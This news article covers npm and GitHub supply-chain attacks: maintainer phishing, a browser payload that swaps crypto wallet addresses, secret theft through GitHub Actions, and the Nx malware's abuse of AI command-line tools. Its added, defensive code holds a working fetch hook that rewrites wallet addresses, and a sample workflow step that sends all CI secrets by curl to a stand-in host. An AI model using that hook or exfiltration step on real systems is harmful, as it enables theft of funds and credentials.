Software packages with more than 2 billion weekly downloads hit in supply-chain attack

The email message Junon fell for came from an address at support.npmjs.help, a domain registered three days earlier to mimic npmjs.com, the official domain of the npm registry. It said Junon's account would be closed unless he updated information related to his 2FA, which requires users to present a physical security key or supply a one-time passcode from an authenticator app in addition to a password when logging in. The two factors are not equally resistant to this kind of lure: a one-time passcode typed into a lookalike site can be relayed to the real login page within its validity window, while a security key bound to the genuine origin cannot be replayed from a different domain.

According to an analysis from security firm Aikido, the malicious code runs inside the web browsers of users of applications built with the compromised packages, where it monitors for transfers of Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash. When it detects such a transaction, it silently replaces the destination wallet with an attacker-controlled address. It worked by hooking JavaScript functions, including fetch, XMLHttpRequest, and wallet APIs. Hooking replaces a function with a wrapper that runs the attacker's code before handing off to the original, so the wrapper can inspect or rewrite arguments, such as a request body, and return values without the calling application noticing.
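To make the hooking mechanism concrete, here is an added example written for this page; it is not the malware and not code from Aikido's analysis. It wraps a fetch function so that wallet addresses in outgoing request bodies are rewritten, then shows two checks an application can run against its own environment: comparing the current fetch with a reference captured before any third-party code loaded, and inspecting whether the function still reports native code. The browser stand-in, the address patterns and the attacker addresses are constructed placeholders, and only the Ethereum and Bitcoin patterns are implemented.

```javascript
// Added example, not the malware or Aikido's analysis: how a fetch hook can rewrite
// wallet addresses in an outgoing request body, and two checks that catch it.
// Everything runs offline against a constructed stand-in for the browser.

// Simplified address patterns (constructed for the example; real validators also
// check checksums). Only two of the six chains named in the article are covered.
const ADDRESS_PATTERNS = {
  ethereum: /\b0x[0-9a-fA-F]{40}\b/g,              // 0x + 40 hex digits
  bitcoin: /\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b/g, // legacy / P2SH base58
};

// Attacker-controlled destinations. CONSTRUCTED placeholders, not real wallets.
const ATTACKER = {
  ethereum: '0x' + 'ab'.repeat(20),
  bitcoin: '1AttackerAttackerAttackerAttacker1',
};

// Rewrite every recognised address in a string with the attacker's for that chain.
function swapAddresses(text) {
  let out = text;
  for (const [chain, pattern] of Object.entries(ADDRESS_PATTERNS)) {
    out = out.replace(pattern, ATTACKER[chain]);
  }
  return out;
}

// The hook: replace target.fetch with a wrapper that edits string bodies, then
// defers to the original so the application sees a normal response.
function installFetchHook(target) {
  const original = target.fetch;
  target.fetch = function hookedFetch(url, init) {
    if (init && typeof init.body === 'string') {
      init = { ...init, body: swapAddresses(init.body) };
    }
    return original.call(this, url, init);
  };
  return original;
}

// Check 1: capture a reference before any third-party bundle runs and compare later.
function makeIntegrityCheck(target, name) {
  const pristine = target[name];
  return () => target[name] === pristine;
}

// Check 2: a browser's built-in fetch stringifies to "function fetch() { [native code] }";
// a JavaScript wrapper does not. (Node implements fetch in JavaScript, so under Node this
// test is only meaningful for genuinely native builtins such as Math.max.)
function looksNative(fn) {
  return /\{\s*\[native code\]\s*\}/.test(Function.prototype.toString.call(fn));
}

// Walk through the attack and the checks against a constructed "browser".
function demo() {
  const sent = [];
  const browser = {
    fetch(url, init) {                   // constructed: records the request instead of sending it
      sent.push({ url, body: init && init.body });
      return Promise.resolve({ ok: true });
    },
  };
  const fetchUnchanged = makeIntegrityCheck(browser, 'fetch'); // taken before the hook
  const intended = '0x' + '12'.repeat(20);

  installFetchHook(browser);             // what the compromised package would do
  browser.fetch('https://wallet.example/send', {
    method: 'POST',
    body: JSON.stringify({ to: intended, value: '1.0' }),
  });

  return {
    intended,
    actual: JSON.parse(sent[0].body).to,   // what actually left the page
    hookDetected: !fetchUnchanged(),
    wrapperLooksNative: looksNative(browser.fetch),
  };
}

console.log(demo());
```

The identity check only works if the reference is taken before any third-party bundle executes, which in practice means an inline script at the top of the document; a wrapper that is installed first will capture the pristine reference itself. The native-code check is cheap but not proof against a wrapper that also overrides its own toString.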

Word of the attack on the npm packages came as two other supply-chain attacks took aim at other repositories that are influential in the open-source software ecosystem. One, disclosed Friday by security firm GitGuardian, compromised 3,325 authentication secrets for accounts on PyPI, npm, Docker Hub, GitHub, Cloudflare, and Amazon Web Services. In all, 327 GitHub users across 817 repositories were affected.

In the attack, compromised maintainer accounts pushed commits that added malicious GitHub Actions workflows, which ran in the repositories' CI and extracted tokens and other authentication secrets. As of Friday, GitGuardian said, nine npm and 15 PyPI packages were at risk of compromise.
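As an added example of the kind of check a maintainer can run against a repository's CI configuration (this is not GitGuardian's tooling, and not the workflow used in the campaign), here is a small Node.js audit that splits a workflow file into steps and flags any step that holds secrets while contacting a host outside an allowlist, or that serializes the entire secrets context. The workflow text and the host allowlist are constructed for the example; the audit is line-oriented and deliberately avoids a YAML dependency.

```javascript
// Added example: audit GitHub Actions workflow text for steps that reference secrets
// and reach hosts outside GitHub. Not GitGuardian's code; sample workflow is constructed.

// Hosts a step may legitimately contact while GitHub secrets are in scope.
// Assumption for the example: anything else counts as off-platform.
const ALLOWED_HOSTS = new Set(['github.com', 'api.github.com', 'uploads.github.com']);

const SECRET_REF = /\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}/g;   // ${{ secrets.NAME }}
const ALL_SECRETS = /\$\{\{\s*toJSON\(\s*secrets\s*\)\s*\}\}/;      // dumps every secret at once
const URL_RE = /https?:\/\/([A-Za-z0-9.-]+)/g;                      // capture the host part
const STEP_START = /^\s*-\s+[A-Za-z_]+:/;                           // "- name:", "- uses:", "- run:"

// Group the lines of each step under its first list item. Lines before the first
// step (name:, on:, jobs:, runs-on:) carry no secrets and are skipped.
function splitSteps(yamlText) {
  const steps = [];
  let current = null;
  for (const line of yamlText.split('\n')) {
    if (STEP_START.test(line)) {
      current = { header: line.trim().replace(/^-\s+/, ''), lines: [] };
      steps.push(current);
    }
    if (current) current.lines.push(line);
  }
  return steps;
}

// Flag a step when secrets are in scope (via env: or inline) and it contacts an
// off-platform host, and always when it serializes the whole secrets context.
function auditWorkflow(yamlText) {
  const findings = [];
  for (const step of splitSteps(yamlText)) {
    const text = step.lines.join('\n');
    const secrets = [...text.matchAll(SECRET_REF)].map((m) => m[1]);
    const dumpsAll = ALL_SECRETS.test(text);
    const hosts = [...text.matchAll(URL_RE)].map((m) => m[1].toLowerCase());
    const offPlatform = hosts.filter((h) => !ALLOWED_HOSTS.has(h));
    const reasons = [];
    if (dumpsAll) reasons.push('serializes the entire secrets context with toJSON(secrets)');
    if ((secrets.length > 0 || dumpsAll) && offPlatform.length > 0) {
      reasons.push(`secrets in scope while contacting ${offPlatform.join(', ')}`);
    }
    if (reasons.length > 0) findings.push({ step: step.header, secrets, hosts: offPlatform, reasons });
  }
  return findings;
}

// Constructed sample: two legitimate steps that use secrets and one that exfiltrates them.
// "\${{" is the template-literal escape; the file on disk would read "${{".
const SAMPLE_WORKFLOW = `name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish package
        env:
          NODE_AUTH_TOKEN: \${{ secrets.NPM_TOKEN }}
        run: npm publish
      - name: Create GitHub release
        env:
          GH_TOKEN: \${{ secrets.GITHUB_TOKEN }}
        run: curl -H "Authorization: Bearer $GH_TOKEN" https://api.github.com/repos/org/repo/releases
      - name: Upload coverage
        env:
          DUMP: \${{ toJSON(secrets) }}
        run: |
          echo "$DUMP" | base64 -w0 > payload.b64
          curl -s --data @payload.b64 https://collector.example.invalid/upload
`;

console.log(JSON.stringify(auditWorkflow(SAMPLE_WORKFLOW), null, 2));
```

The "Publish package" and "Create GitHub release" steps both use secrets but pass, because the first makes no HTTP request the scanner can see and the second only talks to api.github.com. A step can of course hide its destination behind a variable or a DNS lookup, so this is a triage filter for a diff review, not a complete control; the stronger control is not to let a pushed commit change workflow files without review at all.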

A separate supply-chain attack also hit users of GitHub last month, security firm Wiz reported last week. It targeted Nx, an open source build system and repository management tool used in enterprise settings. The initial compromise began with the attackers obtaining a valid authentication token for an npm account.

The malicious code extracted GitHub and npm tokens stored on compromised systems. It also abused AI command-line interfaces installed on those systems to identify additional files that might be useful for accessing repositories of interest. A second phase of the attack used the stolen GitHub tokens to expose private repositories by making them public under the victims' GitHub accounts. The pilfered credentials were uploaded to GitHub repositories whose names contained s1ngularity-repository, which is the basis for the name s1ngularity that Wiz has given to the incident.


